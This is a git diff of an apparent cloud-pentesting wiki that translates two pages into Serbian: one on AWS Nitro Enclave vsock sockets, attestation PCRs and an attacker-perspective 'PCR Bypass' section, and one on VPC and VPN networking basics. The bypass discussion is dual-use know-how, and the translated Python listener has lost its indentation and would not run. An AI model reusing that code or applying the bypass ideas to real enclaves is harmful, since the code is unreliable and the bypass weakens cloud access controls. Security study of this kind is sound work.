-      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-    }
-  }
+"CPUIDs": [
+1,
+3
+],
+"MemoryMiB": 1024,
+"State": "RUNNING",
+"Flags": "DEBUG_MODE",
+"Measurements": {
+"HashAlgorithm": "Sha384 { ... }",
+"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+}
+}
 ]
 

 
 > [!WARNING]
-> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner).
+> Imajte na umu da sa hosta ne postoji način da se sazna da li CID izlaže neki port! Osim ako ne koristite neki **vsock port skener kao** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner).
 
 ### Vsock Server/Listener
 
-Find here a couple of examples:
+Pronađite ovde nekoliko primera:
 
 - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
 
 

 
-Simple Python Listener
-
+Jednostavan Python Listener
 ```python
 #!/usr/bin/env python3
 
@@ -173,30 +156,26 @@ s.listen()
 print(f"Connection opened by cid={remote_cid} port={remote_port}")
 
 while True:
-    buf = conn.recv(64)
-    if not buf:
-        break
+buf = conn.recv(64)
+if not buf:
+break
 
-    print(f"Received bytes: {buf}")
+print(f"Received bytes: {buf}")
 ```
-
 

-
 ```bash
 # Using socat
 socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!"
 ```
+### Vsock Klijent
 
-### Vsock Client
-
-Examples:
+Primeri:
 
 - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
 
 

 
-Simple Python Client
-
+Jednostavni Python Klijent
 ```python
 #!/usr/bin/env python3
 
@@ -212,64 +191,51 @@ s.connect((CID, PORT))
 s.sendall(b"Hello, world!")
 s.close()
 ```
-
 

-
 ```bash
 # Using socat
 echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000
 ```
-
 ### Vsock Proxy
 
-The tool vsock-proxy allows to proxy a vsock proxy with another address, for example:
-
+Alat vsock-proxy omogućava proksiranje vsock proksija sa drugom adresom, na primer:
 ```bash
 vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml
 ```
-
-This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`:
-
+Ovo će proslediti **lokalni port 8001 u vsock** na `ip-ranges.amazonaws.com:443`, a datoteka **`your-vsock-proxy.yaml`** može imati ovaj sadržaj koji omogućava pristup `ip-ranges.amazonaws.com:443`:
 ```yaml
 allowlist:
-  - { address: ip-ranges.amazonaws.com, port: 443 }
+- { address: ip-ranges.amazonaws.com, port: 443 }
 ```
-
-It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port):
-
+Moguće je videti vsock adrese (**`:`**) koje koristi EC2 host sa (napomena: `3:8001`, 3 je CID, a 8001 port):
 ```bash
 sudo ss -l -p -n | grep v_str
 v_str LISTEN 0      0                                                                              3:8001                   *:*     users:(("vsock-proxy",pid=9458,fd=3))
 ```
+## Nitro Enclave Atestacija & KMS
 
-## Nitro Enclave Atestation & KMS
+Nitro Enclaves SDK omogućava enklavi da zatraži **kriptografski potpisan dokument o atestaciji** od Nitro **Hypervisora**, koji uključuje **jedinstvene merenja** specifične za tu enklavu. Ova merenja, koja uključuju **hash-ove i registre konfiguracije platforme (PCRs)**, koriste se tokom procesa atestacije da **dokažu identitet enklave** i **izgrade poverenje sa spoljnim uslugama**. Dokument o atestaciji obično sadrži vrednosti kao što su PCR0, PCR1 i PCR2, koje ste već sreli prilikom izrade i čuvanja EIF-a enklave.
 
-The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF.
+Prema [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), ovo su PCR vrednosti:
 
-From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values:
+
PCRHash of ...Opis
PCR0Fajl slike enklaveKontinuirano merenje sadržaja fajla slike, bez podataka o sekciji.
PCR1Linux kernel i bootstrapKontinuirano merenje podataka kernela i boot ramfs.
PCR2AplikacijaKontinuirano, redosledno merenje korisničkih aplikacija, bez boot ramfs.
PCR3IAM uloga dodeljena roditeljskoj instanciKontinuirano merenje IAM uloge dodeljene roditeljskoj instanci. Osigurava da proces atestacije uspeva samo kada roditeljska instanca ima ispravnu IAM ulogu.
PCR4ID instance roditeljske instanceKontinuirano merenje ID-a roditeljske instance. Osigurava da proces atestacije uspeva samo kada roditeljska instanca ima specifičan ID instance.
PCR8Potpisni sertifikat fajla slike enklaveMerenje potpisnog sertifikata specificiranog za fajl slike enklave. Osigurava da proces atestacije uspeva samo kada je enklava pokrenuta iz fajla slike enklave potpisanog specifičnim sertifikatom.

 
-
PCRHash of ...Description
PCR0Enclave image fileA contiguous measure of the contents of the image file, without the section data.
PCR1Linux kernel and bootstrapA contiguous measurement of the kernel and boot ramfs data.
PCR2ApplicationA contiguous, in-order measurement of the user applications, without the boot ramfs.
PCR3IAM role assigned to the parent instanceA contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.
PCR4Instance ID of the parent instanceA contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.
PCR8Enclave image file signing certificateA measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.

-
-You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**.
+Možete integrisati **kriptografsku atestaciju** u svoje aplikacije i iskoristiti unapred izgrađene integracije sa uslugama kao što je **AWS KMS**. AWS KMS može **validirati atestacije enklave** i nudi ključeve zasnovane na atestaciji (`kms:RecipientAttestation:ImageSha384` i `kms:RecipientAttestation:PCR`) u svojim politikama ključeva. Ove politike osiguravaju da AWS KMS dozvoljava operacije korišćenjem KMS ključa **samo ako je dokument o atestaciji enklave validan** i ispunjava **specificirane uslove**.
 
 > [!TIP]
-> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail.
+> Imajte na umu da Enklave u režimu debagovanja (--debug) generišu dokumente o atestaciji sa PCR-ima koji se sastoje od nula (`000000000000000000000000000000000000000000000000`). Stoga, KMS politike koje proveravaju ove vrednosti će propasti.
 
 ### PCR Bypass
 
-From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement).
+Iz perspektive napadača, primetite da neki PCR-i omogućavaju modifikaciju nekih delova ili cele slike enklave i da će i dalje biti validni (na primer, PCR4 samo proverava ID roditeljske instance, tako da pokretanje bilo koje slike enklave u toj EC2 će omogućiti ispunjavanje ovog potencijalnog PCR zahteva).
 
-Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections.
+Stoga, napadač koji kompromituje EC2 instancu može biti u mogućnosti da pokrene druge slike enklave kako bi zaobišao ove zaštite.
 
-The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO.
+Istraživanje o tome kako modifikovati/kreirati nove slike za zaobilaženje svake zaštite (posebno onih koje nisu tako očigledne) je još uvek TODO.
 
-## References
+## Reference
 
 - [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0)
-- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
+- Sve delove Nitro tutorijala od AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
index 03277bfd1..7f0172f59 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
@@ -4,37 +4,37 @@
 
 ## AWS Networking in a Nutshell
 
-A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**).
+**VPC** sadrži **network CIDR** kao 10.0.0.0/16 (sa svojim **routing table** i **network ACL**).
 
-This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**.
+Ova VPC mreža je podeljena na **subnetworks**, tako da je **subnetwork** direktno **related** sa **VPC**, **routing** **table** i **network ACL**.
 
-Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**.
+Zatim, **Network Interface**-i povezani sa uslugama (kao što su EC2 instance) su **connected** sa **subnetworks** uz **security group(s)**.
 
-Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**.
+Stoga, **security group** će ograničiti izložene portove mrežnih **interfaces using it**, **independently of the subnetwork**. A **network ACL** će **limit** izložene portove na **whole network**.
 
-Moreover, in order to **access Internet**, there are some interesting configurations to check:
+Pored toga, da bi se **access Internet**, postoje neka zanimljiva podešavanja koja treba proveriti:
 
-- A **subnetwork** can **auto-assign public IPv4 addresses**
-- An **instance** created in the network that **auto-assign IPv4 addresses can get one**
-- An **Internet gateway** need to be **attached** to the **VPC**
-  - You could also use **Egress-only internet gateways**
-- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**.
-  - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs)
+- **subnetwork** može **auto-assign public IPv4 addresses**
+- **instance** kreirana u mreži koja **auto-assign IPv4 addresses može dobiti jedan**
+- **Internet gateway** treba da bude **attached** na **VPC**
+- Takođe možete koristiti **Egress-only internet gateways**
+- Takođe možete imati **NAT gateway** u **private subnet** tako da je moguće **connect to external services** iz te privatne podmreže, ali **nije moguće doći do njih sa spolja**.
+- NAT gateway može biti **public** (pristup internetu) ili **private** (pristup drugim VPC-ima)
 
 ![](<../../../../images/image (274).png>)
 
 ## VPC
 
-Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs...
+Amazon **Virtual Private Cloud** (Amazon VPC) omogućava vam da **launch AWS resources into a virtual network** koju ste definisali. Ova virtuelna mreža će imati nekoliko podmreža, Internet Gateway-e za pristup internetu, ACL-e, Security grupe, IP-e...
 
 ### Subnets
 
-Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.
+Subnets pomažu u sprovođenju većeg nivoa sigurnosti. **Logičko grupisanje sličnih resursa** takođe pomaže u održavanju **ease of management** kroz vašu infrastrukturu.
 
-- Valid CIDR are from a /16 netmask to a /28 netmask.
-- A subnet cannot be in different availability zones at the same time.
-- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
-- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
+- Valid CIDR su od /16 netmask do /28 netmask.
+- Subnet ne može biti u različitim dostupnim zonama u isto vreme.
+- **AWS rezerviše prva tri host IP adrese** svake podmreže **za** **internal AWS usage**: prva host adresa se koristi za VPC ruter. Druga adresa je rezervisana za AWS DNS, a treća adresa je rezervisana za buduću upotrebu.
+- Zovu se **public subnets** one koje imaju **direct access to the Internet, dok privatne podmreže nemaju.**
 
 

 
@@ -42,15 +42,15 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi
 
 ### Route Tables
 
-Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the:
+Route tables određuju usmeravanje saobraćaja za podmrežu unutar VPC-a. Određuju koji mrežni saobraćaj se prosleđuje internetu ili VPN konekciji. Obično ćete pronaći pristup do:
 
-- Local VPC
+- Lokalnog VPC-a
 - NAT
-- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet).
-  - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC.
-- VPC endpoints (to access S3 from private networks)
+- Internet Gateway-a / Egress-only Internet gateway-a (potrebno za davanje VPC-u pristupa internetu).
+- Da biste učinili podmrežu javnom, potrebno je da **create** i **attach** **Internet gateway** na vaš VPC.
+- VPC endpoints (za pristup S3 iz privatnih mreža)
 
-In the following images you can check the differences in a default public network and a private one:
+Na sledećim slikama možete proveriti razlike između podrazumevane javne mreže i privatne:
 
 

 
@@ -58,142 +58,138 @@ In the following images you can check the differences in a default public networ
 
 ### ACLs
 
-**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges.
+**Network Access Control Lists (ACLs)**: Mrežne ACL-ove su pravila vatrozida koja kontrolišu dolazni i odlazni mrežni saobraćaj do podmreže. Mogu se koristiti za dozvoljavanje ili odbijanje saobraćaja za određene IP adrese ili opsege.
 
-- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections
-- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed
+- Najčešće se koristi dozvola/odbijanje pristupa koristeći sigurnosne grupe, ali ovo je jedini način da se potpuno prekine uspostavljene obrnute ljuske. Izmenjeno pravilo u sigurnosnim grupama ne zaustavlja već uspostavljene veze.
+- Međutim, ovo se odnosi na celu podmrežu, budite oprezni kada zabranjujete stvari jer bi potrebna funkcionalnost mogla biti poremećena.
 
 ### Security Groups
 
-Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\
-Usually this is used to open dangerous ports in instances, such as port 22 for example:
+Sigurnosne grupe su virtuelni **firewall** koji kontroliše dolazni i odlazni mrežni **traffic to instances** u VPC-u. Odnos 1 SG na M instance (obično 1 na 1).\
+Obično se koristi za otvaranje opasnih portova u instancama, kao što je port 22 na primer:
 
 

 
 ### Elastic IP Addresses
 
-An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account.
+_Elastic IP adresa_ je **static IPv4 address** dizajnirana za dinamičko cloud računarstvo. Elastic IP adresa se dodeljuje vašem AWS nalogu i vaša je dok je ne oslobodite. Korišćenjem Elastic IP adrese, možete maskirati kvar instance ili softvera brzo preusmeravajući adresu na drugu instancu u vašem nalogu.
 
 ### Connection between subnets
 
-By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on.
+Podrazumevano, sve podmreže imaju **automatski dodeljenu javnu IP adresu isključenu**, ali se može uključiti.
 
-**A local route within a route table enables communication between VPC subnets.**
+**Lokalna ruta unutar tabele ruta omogućava komunikaciju između VPC podmreža.**
 
-If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
+Ako **povezujete podmrežu sa drugom podmrežom, ne možete pristupiti podmrežama povezanim** sa drugom podmrežom, morate direktno uspostaviti vezu sa njima. **Ovo se takođe odnosi na internet gateway-e**. Ne možete proći kroz vezu podmreže da biste pristupili internetu, morate dodeliti internet gateway svojoj podmreži.
 
 ### VPC Peering
 
-VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
+VPC peering vam omogućava da **connect two or more VPCs together**, koristeći IPV4 ili IPV6, kao da su deo iste mreže.
 
-Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
-If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
-Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
+Jednom kada je uspostavljena veza, **resources in one VPC can access resources in the other**. Povezanost između VPC-ova se implementira kroz postojeću AWS mrežnu infrastrukturu, tako da je visoko dostupna bez uskog grla u propusnosti. Kako **peered connections operate as if they were part of the same network**, postoje ograničenja kada su u pitanju vaši CIDR opsezi koji se mogu koristiti.\
+Ako imate **overlapping or duplicate CIDR** opsege za vaš VPC, onda **nećete moći da povežete VPC-ove** zajedno.\
+Svaki AWS VPC će **samo komunicirati sa svojim peer-om**. Na primer, ako imate vezu između VPC 1 i VPC 2, i drugu vezu između VPC 2 i VPC 3, kao što je prikazano, tada bi VPC 1 i 2 mogli direktno komunicirati jedni s drugima, kao i VPC 2 i VPC 3, međutim, VPC 1 i VPC 3 ne bi mogli. **Ne možete usmeriti kroz jedan VPC da biste došli do drugog.**
 
 ### **VPC Flow Logs**
 
-Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
+Unutar vašeg VPC-a, mogli biste imati stotine ili čak hiljade resursa koji komuniciraju između različitih podmreža, kako javnih tako i privatnih, kao i između različitih VPC-ova putem VPC peering veza. **VPC Flow Logs vam omogućavaju da zabeležite IP saobraćajne informacije koje teku između vaših mrežnih interfejsa vaših resursa unutar vašeg VPC-a**.
 
-Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**.
+Za razliku od S3 pristupnih logova i CloudFront pristupnih logova, **podaci logova generisani od strane VPC Flow Logs se ne čuvaju u S3. Umesto toga, podaci logova se šalju u CloudWatch logove**.
 
-Limitations:
+Ograničenja:
 
-- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account.
-- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces
-- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one.
-- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server.
-- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service.
-- Traffic relating to an Amazon Windows activation license from a Windows instance
-- Traffic between a network load balancer interface and an endpoint network interface
+- Ako pokrećete VPC peered vezu, tada ćete moći da vidite samo flow logove peered VPC-ova koji su unutar istog naloga.
+- Ako još uvek pokrećete resurse unutar EC2-Classic okruženja, nažalost nećete moći da dobijete informacije sa njihovih interfejsa.
+- Kada je VPC Flow Log kreiran, ne može se izmeniti. Da biste izmenili konfiguraciju VPC Flow Log-a, morate ga obrisati i zatim kreirati novi.
+- Sledeći saobraćaj se ne prati i ne beleži u logovima. DHCP saobraćaj unutar VPC-a, saobraćaj iz instanci namenjen Amazon DNS Serveru.
+- Bilo koji saobraćaj namenjen IP adresi za VPC podrazumevnog rutera i saobraćaj do i od sledećih adresa, 169.254.169.254 koja se koristi za prikupljanje metapodataka instance, i 169.254.169.123 koja se koristi za Amazon Time Sync Service.
+- Saobraćaj koji se odnosi na licencu za aktivaciju Amazon Windows iz Windows instance.
+- Saobraćaj između interfejsa mrežnog balansiranja opterećenja i interfejsa krajnje tačke mreže.
 
-For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
+Za svaki mrežni interfejs koji objavljuje podatke u CloudWatch log grupu, koristiće se različiti log stream. I unutar svakog od ovih stream-ova, biće podaci o događajima flow log-a koji prikazuju sadržaj log unosa. Svaki od ovih **logova beleži podatke tokom prozora od otprilike 10 do 15 minuta**.
 
 ## VPN
 
 ### Basic AWS VPN Components
 
 1. **Customer Gateway**:
-   - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
-   - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
-   - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
-   - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
+- Customer Gateway je resurs koji kreirate u AWS-u da biste predstavili vašu stranu VPN veze.
+- To je u suštini fizički uređaj ili softverska aplikacija na vašoj strani Site-to-Site VPN veze.
+- Pružate informacije o usmeravanju i javnu IP adresu vašeg mrežnog uređaja (kao što je ruter ili vatrozid) AWS-u da biste kreirali Customer Gateway.
+- Služi kao referentna tačka za postavljanje VPN veze i ne donosi dodatne troškove.
 2. **Virtual Private Gateway**:
-   - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
-   - It is attached to your VPC and serves as the target for your VPN connection.
-   - VPG is the AWS side endpoint for the VPN connection.
-   - It handles the secure communication between your VPC and your on-premises network.
+- Virtual Private Gateway (VPG) je VPN koncentrator na Amazon strani Site-to-Site VPN veze.
+- Povezan je sa vašim VPC-om i služi kao cilj za vašu VPN vezu.
+- VPG je AWS strana krajnje tačke za VPN vezu.
+- Rukuje sigurnom komunikacijom između vašeg VPC-a i vaše lokalne mreže.
 3. **Site-to-Site VPN Connection**:
-   - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
-   - This type of connection requires a Customer Gateway and a Virtual Private Gateway.
-   - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
-   - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
+- Site-to-Site VPN veza povezuje vašu lokalnu mrežu sa VPC-om kroz sigurni, IPsec VPN tunel.
+- Ova vrsta veze zahteva Customer Gateway i Virtual Private Gateway.
+- Koristi se za sigurnu, stabilnu i doslednu komunikaciju između vašeg data centra ili mreže i vašeg AWS okruženja.
+- Obično se koristi za redovne, dugoročne veze i naplaćuje se na osnovu količine podataka prenetih preko veze.
 4. **Client VPN Endpoint**:
-   - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
-   - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
-   - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
-   - With Client VPN, each client device uses a VPN client software to establish a secure connection.
+- Client VPN endpoint je resurs koji kreirate u AWS-u da omogućite i upravljate klijent VPN sesijama.
+- Koristi se za omogućavanje pojedinačnim uređajima (kao što su laptopi, pametni telefoni itd.) da se sigurno povežu sa AWS resursima ili vašom lokalnom mrežom.
+- Razlikuje se od Site-to-Site VPN po tome što je dizajniran za pojedinačne klijente, a ne za povezivanje celih mreža.
+- Sa Client VPN-om, svaki klijentski uređaj koristi VPN klijentski softver za uspostavljanje sigurne veze.
 
 ### Site-to-Site VPN
 
-**Connect your on premisses network with your VPC.**
+**Povežite vašu lokalnu mrežu sa vašim VPC-om.**
 
-- **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
-- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
+- **VPN connection**: Sigurna veza između vaše lokalne opreme i vaših VPC-ova.
+- **VPN tunnel**: Enkriptovana veza kroz koju podaci mogu prolaziti iz mreže klijenta ka AWS-u ili obrnuto.
 
-  Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.
+Svaka VPN veza uključuje dva VPN tunela koja možete istovremeno koristiti za visoku dostupnost.
 
-- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.
-- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.
-- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
+- **Customer gateway**: AWS resurs koji pruža informacije AWS-u o vašem uređaju za customer gateway.
+- **Customer gateway device**: Fizički uređaj ili softverska aplikacija na vašoj strani Site-to-Site VPN veze.
+- **Virtual private gateway**: VPN koncentrator na Amazon strani Site-to-Site VPN veze. Koristite virtuelni privatni gateway ili transit gateway kao gateway za Amazon stranu Site-to-Site VPN veze.
+- **Transit gateway**: Transit hub koji se može koristiti za međusobno povezivanje vaših VPC-ova i lokalnih mreža. Koristite transit gateway ili virtuelni privatni gateway kao gateway za Amazon stranu Site-to-Site VPN veze.
 
 #### Limitations
 
-- IPv6 traffic is not supported for VPN connections on a virtual private gateway.
-- An AWS VPN connection does not support Path MTU Discovery.
+- IPv6 saobraćaj nije podržan za VPN veze na virtuelnom privatnom gateway-u.
+- AWS VPN veza ne podržava Path MTU Discovery.
 
-In addition, take the following into consideration when you use Site-to-Site VPN.
+Pored toga, uzmite u obzir sledeće kada koristite Site-to-Site VPN.
 
-- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
+- Kada povezujete svoje VPC-ove sa zajedničkom lokalnom mrežom, preporučujemo da koristite nepreklapajuće CIDR blokove za vaše mreže.
 
 ### Client VPN 
 
-**Connect from your machine to your VPC**
+**Povežite se sa vašeg računara na vaš VPC**
 
 #### Concepts
 
-- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
-- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
-- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
-- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
-- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
-- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
-- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
-- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
-- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
